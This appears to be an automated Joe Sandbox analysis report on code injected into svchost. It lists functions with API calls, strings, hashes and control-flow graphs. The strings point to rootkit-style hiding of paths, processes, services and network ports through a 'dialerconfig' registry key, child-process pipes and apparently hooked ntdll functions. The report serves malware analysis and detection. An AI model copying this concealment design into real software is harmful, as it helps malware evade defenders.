                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                          • String ID:
                                                                          • API String ID: 1239891234-0
                                                                          • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                          • Instruction ID: de600b675c99b63b07bfc61b3ea15e563d1fd6e5409b2fafadfe2c025ff4e9af
                                                                          • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                          • Instruction Fuzzy Hash: B7316672254FC196EB608B25E8803FE73A4F789798F540166EA9D43BA8EF38C545CB00
                                                                          Function 000001F28C931628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                          • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                          • API String ID: 106492572-2879589442
                                                                          • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                          • Instruction ID: c2eb12f427962f4a473e0d6cdd6568ad5d847194dadf60defaa1d10753933b52
                                                                          • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                          • Instruction Fuzzy Hash: A871D676250E92C6EB209F76E8906F923E4FB84BCDF046161DE4E57A69EF38C444C744
                                                                          Function 000001F28C9312BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                          • String ID: d
                                                                          • API String ID: 2005889112-2564639436
                                                                          • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                          • Instruction ID: 18f95a425c74309a6456fd4bbe7ec78cd519c13267e7c4c7f8ddd63764443e45
                                                                          • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                          • Instruction Fuzzy Hash: 8E512676244F85C6EB54CF62E5483BAB7E1F789BD9F048134DA4A07B68EF38C1498B00
                                                                          Function 000001F28C931D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread$AddressHandleModuleProc
                                                                          • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                          • API String ID: 4175298099-1975688563
                                                                          • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                          • Instruction ID: 9487c6cd3bd73dd193c882a9535ab93ec09423b9485fe8c9d985bb2c2d5cc9fb
                                                                          • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                          • Instruction Fuzzy Hash: A3318F79280ECBA1EA05EBB5EC616F463A4F7043C4F88A0F3E85953576AF388259C350
                                                                          Function 000001F28C1D6910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 232 1f28c1d6910-1f28c1d6916 233 1f28c1d6951-1f28c1d695b 232->233 234 1f28c1d6918-1f28c1d691b 232->234 235 1f28c1d6a78-1f28c1d6a8d 233->235 236 1f28c1d691d-1f28c1d6920 234->236 237 1f28c1d6945-1f28c1d6984 call 1f28c1d6fc0 234->237 241 1f28c1d6a8f 235->241 242 1f28c1d6a9c-1f28c1d6ab6 call 1f28c1d6e54 235->242 239 1f28c1d6938 __scrt_dllmain_crt_thread_attach 236->239 240 1f28c1d6922-1f28c1d6925 236->240 255 1f28c1d698a-1f28c1d699f call 1f28c1d6e54 237->255 256 1f28c1d6a52 237->256 244 1f28c1d693d-1f28c1d6944 239->244 246 1f28c1d6931-1f28c1d6936 call 1f28c1d6f04 240->246 247 1f28c1d6927-1f28c1d6930 240->247 248 1f28c1d6a91-1f28c1d6a9b 241->248 253 1f28c1d6aef-1f28c1d6b20 call 1f28c1d7190 242->253 254 1f28c1d6ab8-1f28c1d6aed call 1f28c1d6f7c call 1f28c1d6e1c call 1f28c1d7318 call 1f28c1d7130 call 1f28c1d7154 call 1f28c1d6fac 242->254 246->244 264 1f28c1d6b31-1f28c1d6b37 253->264 265 1f28c1d6b22-1f28c1d6b28 253->265 254->248 267 1f28c1d6a6a-1f28c1d6a77 call 1f28c1d7190 255->267 268 1f28c1d69a5-1f28c1d69b6 call 1f28c1d6ec4 255->268 259 1f28c1d6a54-1f28c1d6a69 256->259 270 1f28c1d6b7e-1f28c1d6b94 call 1f28c1d268c 264->270 271 1f28c1d6b39-1f28c1d6b43 264->271 265->264 269 1f28c1d6b2a-1f28c1d6b2c 265->269 267->235 285 1f28c1d6a07-1f28c1d6a11 call 1f28c1d7130 268->285 286 1f28c1d69b8-1f28c1d69dc call 1f28c1d72dc call 1f28c1d6e0c call 1f28c1d6e38 call 1f28c1dac0c 268->286 275 1f28c1d6c1f-1f28c1d6c2c 269->275 288 1f28c1d6bcc-1f28c1d6bce 270->288 289 1f28c1d6b96-1f28c1d6b98 270->289 276 1f28c1d6b4f-1f28c1d6b5d call 1f28c1e5780 271->276 277 1f28c1d6b45-1f28c1d6b4d 271->277 282 1f28c1d6b63-1f28c1d6b78 call 1f28c1d6910 276->282 299 1f28c1d6c15-1f28c1d6c1d 276->299 277->282 282->270 282->299 285->256 308 1f28c1d6a13-1f28c1d6a1f call 1f28c1d7180 285->308 286->285 335 1f28c1d69de-1f28c1d69e5 __scrt_dllmain_after_initialize_c 286->335 297 1f28c1d6bd0-1f28c1d6bd3 288->297 298 1f28c1d6bd5-1f28c1d6bea call 1f28c1d6910 288->298 289->288 296 1f28c1d6b9a-1f28c1d6bbc call 1f28c1d268c call 1f28c1d6a78 289->296 296->288 329 1f28c1d6bbe-1f28c1d6bc6 call 1f28c1e5780 296->329 297->298 297->299 298->299 317 1f28c1d6bec-1f28c1d6bf6 298->317 299->275 319 1f28c1d6a21-1f28c1d6a2b call 1f28c1d7098 308->319 320 1f28c1d6a45-1f28c1d6a50 308->320 323 1f28c1d6c01-1f28c1d6c11 call 1f28c1e5780 317->323 324 1f28c1d6bf8-1f28c1d6bff 317->324 319->320 334 1f28c1d6a2d-1f28c1d6a3b 319->334 320->259 323->299 324->299 329->288 334->320 335->285 336 1f28c1d69e7-1f28c1d6a04 call 1f28c1dabc8 335->336 336->285
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3593423408.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c1d0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                          • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                          • API String ID: 190073905-1786718095
                                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction ID: 3ae14674ec2a8346f3f84ed9e0c01df585913646f7da2965e941060b61735599
                                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction Fuzzy Hash: F581F0717C0E038AFA54DB66A4C03F96ED0AB85BC0F448935FB498379ADB38E8458700
                                                                          Function 000001F28C93CE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetLastError.KERNEL32 ref: 000001F28C93CE37
                                                                          • FlsGetValue.KERNEL32(?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CE4C
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CE6D
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CE9A
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CEAB
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CEBC
                                                                          • SetLastError.KERNEL32 ref: 000001F28C93CED7
                                                                          • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CF0D
                                                                          • FlsSetValue.KERNEL32(?,?,00000001,000001F28C93ECCC,?,?,?,?,000001F28C93BF9F,?,?,?,?,?,000001F28C937AB0), ref: 000001F28C93CF2C
                                                                            • Part of subcall function 000001F28C93D6CC: HeapAlloc.KERNEL32 ref: 000001F28C93D721
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CF54
                                                                            • Part of subcall function 000001F28C93D744: HeapFree.KERNEL32 ref: 000001F28C93D75A
                                                                            • Part of subcall function 000001F28C93D744: GetLastError.KERNEL32 ref: 000001F28C93D764
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CF65
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CF76
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorLast$Heap$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 570795689-0
                                                                          • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                          • Instruction ID: c1dccc9a58c3acbe364e99b3de5aaac7dedc88dfaa24f6078136831367b18d4b
                                                                          • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                          • Instruction Fuzzy Hash: 274149713C1EC782FA68A73159553FA22C25B84BF4F2C27B4E836076E6EF3998018200
                                                                          Function 000001F28C932244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                          • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                          • API String ID: 2171963597-1373409510
                                                                          • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                          • Instruction ID: 57cb264d3990d0bdc8e496bdce57bc45f54469c11ba177c15f029bb998e39be8
                                                                          • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                          • Instruction Fuzzy Hash: BE213876658E82C2EB209B25F4443BA67E0F789BE5F544265EA5907AA8DF3CC149CB00
                                                                          Function 000001F28C1D9944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 490 1f28c1d9944-1f28c1d99ac call 1f28c1da814 493 1f28c1d9e13-1f28c1d9e1b call 1f28c1dbb48 490->493 494 1f28c1d99b2-1f28c1d99b5 490->494 494->493 495 1f28c1d99bb-1f28c1d99c1 494->495 497 1f28c1d9a90-1f28c1d9aa2 495->497 498 1f28c1d99c7-1f28c1d99cb 495->498 500 1f28c1d9aa8-1f28c1d9aac 497->500 501 1f28c1d9d63-1f28c1d9d67 497->501 498->497 502 1f28c1d99d1-1f28c1d99dc 498->502 500->501 505 1f28c1d9ab2-1f28c1d9abd 500->505 503 1f28c1d9da0-1f28c1d9daa call 1f28c1d8a34 501->503 504 1f28c1d9d69-1f28c1d9d70 501->504 502->497 506 1f28c1d99e2-1f28c1d99e7 502->506 503->493 516 1f28c1d9dac-1f28c1d9dcb call 1f28c1d6d40 503->516 504->493 507 1f28c1d9d76-1f28c1d9d9b call 1f28c1d9e1c 504->507 505->501 509 1f28c1d9ac3-1f28c1d9aca 505->509 506->497 510 1f28c1d99ed-1f28c1d99f7 call 1f28c1d8a34 506->510 507->503 513 1f28c1d9ad0-1f28c1d9b07 call 1f28c1d8e10 509->513 514 1f28c1d9c94-1f28c1d9ca0 509->514 510->516 524 1f28c1d99fd-1f28c1d9a28 call 1f28c1d8a34 * 2 call 1f28c1d9124 510->524 513->514 529 1f28c1d9b0d-1f28c1d9b15 513->529 514->503 517 1f28c1d9ca6-1f28c1d9caa 514->517 521 1f28c1d9cba-1f28c1d9cc2 517->521 522 1f28c1d9cac-1f28c1d9cb8 call 1f28c1d90e4 517->522 521->503 528 1f28c1d9cc8-1f28c1d9cd5 call 1f28c1d8cb4 521->528 522->521 538 1f28c1d9cdb-1f28c1d9ce3 522->538 558 1f28c1d9a2a-1f28c1d9a2e 524->558 559 1f28c1d9a48-1f28c1d9a52 call 1f28c1d8a34 524->559 528->503 528->538 530 1f28c1d9b19-1f28c1d9b4b 529->530 535 1f28c1d9b51-1f28c1d9b5c 530->535 536 1f28c1d9c87-1f28c1d9c8e 530->536 535->536 539 1f28c1d9b62-1f28c1d9b7b 535->539 536->514 536->530 540 1f28c1d9df6-1f28c1d9e12 call 1f28c1d8a34 * 2 call 1f28c1dbaa8 538->540 541 1f28c1d9ce9-1f28c1d9ced 538->541 543 1f28c1d9b81-1f28c1d9bc6 call 1f28c1d90f8 * 2 539->543 544 1f28c1d9c74-1f28c1d9c79 539->544 540->493 545 1f28c1d9cef-1f28c1d9cfe call 1f28c1d90e4 541->545 546 1f28c1d9d00 541->546 571 1f28c1d9bc8-1f28c1d9bee call 1f28c1d90f8 call 1f28c1da038 543->571 572 1f28c1d9c04-1f28c1d9c0a 543->572 550 1f28c1d9c84 544->550 554 1f28c1d9d03-1f28c1d9d0d call 1f28c1da8ac 545->554 546->554 550->536 554->503 569 1f28c1d9d13-1f28c1d9d61 call 1f28c1d8d44 call 1f28c1d8f50 554->569 558->559 563 1f28c1d9a30-1f28c1d9a3b 558->563 559->497 575 1f28c1d9a54-1f28c1d9a74 call 1f28c1d8a34 * 2 call 1f28c1da8ac 559->575 563->559 568 1f28c1d9a3d-1f28c1d9a42 563->568 568->493 568->559 569->503 591 1f28c1d9bf0-1f28c1d9c02 571->591 592 1f28c1d9c15-1f28c1d9c72 call 1f28c1d9870 571->592 579 1f28c1d9c7b 572->579 580 1f28c1d9c0c-1f28c1d9c10 572->580 596 1f28c1d9a8b 575->596 597 1f28c1d9a76-1f28c1d9a80 call 1f28c1da99c 575->597 581 1f28c1d9c80 579->581 580->543 581->550 591->571 591->572 592->581 596->497 600 1f28c1d9df0-1f28c1d9df5 call 1f28c1dbaa8 597->600 601 1f28c1d9a86-1f28c1d9def call 1f28c1d86ac call 1f28c1da3f4 call 1f28c1d88a0 597->601 600->540 601->600
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3593423408.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c1d0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 849930591-393685449
                                                                          • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction ID: a9609446f00a766f3d3b655ef47b5d2ff7605ba4997714f758606ca2dc9d6f4c
                                                                          • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction Fuzzy Hash: 38E15672644F828AEB609F65E4803ED7BE0F755BD8F104125EB8957B9ACF38E491C740
                                                                          Function 000001F28C93A544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 611 1f28c93a544-1f28c93a5ac call 1f28c93b414 614 1f28c93aa13-1f28c93aa1b call 1f28c93c748 611->614 615 1f28c93a5b2-1f28c93a5b5 611->615 615->614 616 1f28c93a5bb-1f28c93a5c1 615->616 618 1f28c93a5c7-1f28c93a5cb 616->618 619 1f28c93a690-1f28c93a6a2 616->619 618->619 623 1f28c93a5d1-1f28c93a5dc 618->623 621 1f28c93a963-1f28c93a967 619->621 622 1f28c93a6a8-1f28c93a6ac 619->622 626 1f28c93a969-1f28c93a970 621->626 627 1f28c93a9a0-1f28c93a9aa call 1f28c939634 621->627 622->621 624 1f28c93a6b2-1f28c93a6bd 622->624 623->619 625 1f28c93a5e2-1f28c93a5e7 623->625 624->621 630 1f28c93a6c3-1f28c93a6ca 624->630 625->619 631 1f28c93a5ed-1f28c93a5f7 call 1f28c939634 625->631 626->614 628 1f28c93a976-1f28c93a99b call 1f28c93aa1c 626->628 627->614 637 1f28c93a9ac-1f28c93a9cb call 1f28c937940 627->637 628->627 634 1f28c93a894-1f28c93a8a0 630->634 635 1f28c93a6d0-1f28c93a707 call 1f28c939a10 630->635 631->637 645 1f28c93a5fd-1f28c93a628 call 1f28c939634 * 2 call 1f28c939d24 631->645 634->627 638 1f28c93a8a6-1f28c93a8aa 634->638 635->634 649 1f28c93a70d-1f28c93a715 635->649 642 1f28c93a8ac-1f28c93a8b8 call 1f28c939ce4 638->642 643 1f28c93a8ba-1f28c93a8c2 638->643 642->643 658 1f28c93a8db-1f28c93a8e3 642->658 643->627 648 1f28c93a8c8-1f28c93a8d5 call 1f28c9398b4 643->648 679 1f28c93a648-1f28c93a652 call 1f28c939634 645->679 680 1f28c93a62a-1f28c93a62e 645->680 648->627 648->658 654 1f28c93a719-1f28c93a74b 649->654 655 1f28c93a887-1f28c93a88e 654->655 656 1f28c93a751-1f28c93a75c 654->656 655->634 655->654 656->655 660 1f28c93a762-1f28c93a77b 656->660 661 1f28c93a8e9-1f28c93a8ed 658->661 662 1f28c93a9f6-1f28c93aa12 call 1f28c939634 * 2 call 1f28c93c6a8 658->662 664 1f28c93a874-1f28c93a879 660->664 665 1f28c93a781-1f28c93a7c6 call 1f28c939cf8 * 2 660->665 666 1f28c93a900 661->666 667 1f28c93a8ef-1f28c93a8fe call 1f28c939ce4 661->667 662->614 670 1f28c93a884 664->670 692 1f28c93a804-1f28c93a80a 665->692 693 1f28c93a7c8-1f28c93a7ee call 1f28c939cf8 call 1f28c93ac38 665->693 675 1f28c93a903-1f28c93a90d call 1f28c93b4ac 666->675 667->675 670->655 675->627 690 1f28c93a913-1f28c93a961 call 1f28c939944 call 1f28c939b50 675->690 679->619 696 1f28c93a654-1f28c93a674 call 1f28c939634 * 2 call 1f28c93b4ac 679->696 680->679 684 1f28c93a630-1f28c93a63b 680->684 684->679 689 1f28c93a63d-1f28c93a642 684->689 689->614 689->679 690->627 700 1f28c93a80c-1f28c93a810 692->700 701 1f28c93a87b 692->701 712 1f28c93a815-1f28c93a872 call 1f28c93a470 693->712 713 1f28c93a7f0-1f28c93a802 693->713 717 1f28c93a676-1f28c93a680 call 1f28c93b59c 696->717 718 1f28c93a68b 696->718 700->665 702 1f28c93a880 701->702 702->670 712->702 713->692 713->693 721 1f28c93a686-1f28c93a9ef call 1f28c9392ac call 1f28c93aff4 call 1f28c9394a0 717->721 722 1f28c93a9f0-1f28c93a9f5 call 1f28c93c6a8 717->722 718->619 721->722 722->662
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 849930591-393685449
                                                                          • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                          • Instruction ID: e40025dd339e04ccce31ab42e6e43acdbfcb282d0efd4a44ebad16c513d6860d
                                                                          • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                          • Instruction Fuzzy Hash: 51E17A72640B828AEB209BB598803FD77E0F755BE8F196166EE8957B99CF34C481C701
                                                                          Function 000001F28C93F394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeLibraryProc
                                                                          • String ID: api-ms-$ext-ms-
                                                                          • API String ID: 3013587201-537541572
                                                                          • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                          • Instruction ID: 13c93742e32ee18173703abb3e1a129c63d5b1ec7d71d03a5c5f3c659c718adc
                                                                          • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                          • Instruction Fuzzy Hash: 1E41AF72391E82D1EB16CB76A9087F623D1FB49BE0F0962B9DD0A87785EF39C4458314
                                                                          Function 000001F28C93104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                          • String ID: d
                                                                          • API String ID: 3743429067-2564639436
                                                                          • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                          • Instruction ID: e61549d0980b68c844d3942048ca76a1816c2b656e0948ec105a341f4de0e688
                                                                          • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                          • Instruction Fuzzy Hash: 2D412A72254FC5CAE760CF61E4447EA77E1F389B99F448129DA8907B58EF38C589CB40
                                                                          Function 000001F28C93D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FlsGetValue.KERNEL32(?,?,?,000001F28C93C7DE,?,?,?,?,?,?,?,?,000001F28C93CF9D,?,?,00000001), ref: 000001F28C93D087
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001F28C93C7DE,?,?,?,?,?,?,?,?,000001F28C93CF9D,?,?,00000001), ref: 000001F28C93D0A6
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001F28C93C7DE,?,?,?,?,?,?,?,?,000001F28C93CF9D,?,?,00000001), ref: 000001F28C93D0CE
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001F28C93C7DE,?,?,?,?,?,?,?,?,000001F28C93CF9D,?,?,00000001), ref: 000001F28C93D0DF
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001F28C93C7DE,?,?,?,?,?,?,?,?,000001F28C93CF9D,?,?,00000001), ref: 000001F28C93D0F0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Value
                                                                          • String ID: 1%$Y%
                                                                          • API String ID: 3702945584-1395475152
                                                                          • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                          • Instruction ID: 5dc8ff007fbd2db76a624d83063225198278ec11a387f4125d1c2f12366c8b68
                                                                          • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                          • Instruction Fuzzy Hash: D2119332794EC782FA68973565613FA62C95B44BF4F1C63F4E839076EADF38C4028200
                                                                          Function 000001F28C937510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                          • String ID:
                                                                          • API String ID: 190073905-0
                                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction ID: 9b580adf4509b41eb4a94773ff5a8102b7ce542dff54e5b26089740a9ad9f4c5
                                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction Fuzzy Hash: ED81F771780EC386FB54AB35AA513F922D1AB85BCCF1CA4F5E90987796EB38C845C710
                                                                          Function 000001F28C939DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                                          • String ID: api-ms-
                                                                          • API String ID: 2559590344-2084034818
